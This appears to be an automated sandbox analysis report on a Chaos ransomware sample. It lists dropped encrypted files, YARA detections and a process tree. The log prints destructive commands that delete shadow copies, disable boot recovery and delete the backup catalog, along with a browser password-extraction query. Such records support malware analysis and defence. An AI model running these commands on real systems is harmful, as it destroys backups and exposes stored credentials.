                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin.deathgrip entropy: 7.99953676863Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Diagnostics\1612347604\2023100507.000\results.xsl.deathgrip entropy: 7.99630723167Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json.deathgrip entropy: 7.99118805853Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.deathgrip entropy: 7.99671414757Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\first_party_sets.db.deathgrip entropy: 7.99550060783Jump to dropped file

                  System Summary

                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects destructive malware Author: Florian Roth
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE Matched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE Matched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: Detects Chaos ransomware Author: ditekSHen
                  Source: svchost.exe.3.dr, Program.cs Long String: Length: 664960
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00047A8F: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                  Source: C:\Windows\System32\wbadmin.exe File created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Windows\System32\wbengine.exe Process token adjusted: Security
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: String function: 0005FD4C appears 42 times
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: String function: 000605F0 appears 31 times
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: String function: 0005FE20 appears 56 times
                  Source: C:\Users\user\Desktop\Mai.exe Code function: String function: 00007FFBA45A8C40 appears 31 times
                  Source: C:\Users\user\Desktop\Mai.exe Code function: String function: 00007FFBA45CFF00 appears 38 times
                  Source: C:\Users\user\Desktop\Mai.exe Code function: String function: 00007FFBA45A8E10 appears 129 times
                  Source: C:\Users\user\Desktop\Mai.exe Code function: String function: 00007FFBA45A9D60 appears 171 times
                  Source: C:\Users\user\Desktop\Mai.exe Code function: String function: 00007FF6DD652B30 appears 47 times
                  Source: _overlapped.pyd.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: unicodedata.pyd.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: api-ms-win-crt-conio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: python3.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemain.exe4 vs 4wx72yFLka.exe
                  Source: 4wx72yFLka.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: svchost.exe.3.dr, Program.cs Base64 encoded string:
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: .vb.m1v.sln.pst.obj
                  Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@62/1169@1/2
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00047707 GetLastError,FormatMessageW,0_2_00047707
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0005B6A2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0005B6A2
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6747609
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                  Source: C:\Users\user\Desktop\Mai.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76562
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Command line argument: sfxname 0_2_0005EEDC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Command line argument: sfxstime 0_2_0005EEDC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Command line argument: STARTDLG 0_2_0005EEDC
                  Source: 4wx72yFLka.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe File read: C:\Windows\win.ini
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: Mai.exe, Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: 4wx72yFLka.exe ReversingLabs: Detection: 63%
                  Source: 4wx72yFLka.exe Virustotal: Detection: 50%
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe File read: C:\Users\user\Desktop\4wx72yFLka.exe
                  Source: unknown Process created: C:\Users\user\Desktop\4wx72yFLka.exe "C:\Users\user\Desktop\4wx72yFLka.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: unknown Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: unknown Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
                  Source: unknown Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: unknown Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: dxgidebug.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: sfc_os.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: dwmapi.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: riched20.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: usp10.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: msls31.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: iconcodecservice.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: pcacli.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: wintypes.dll
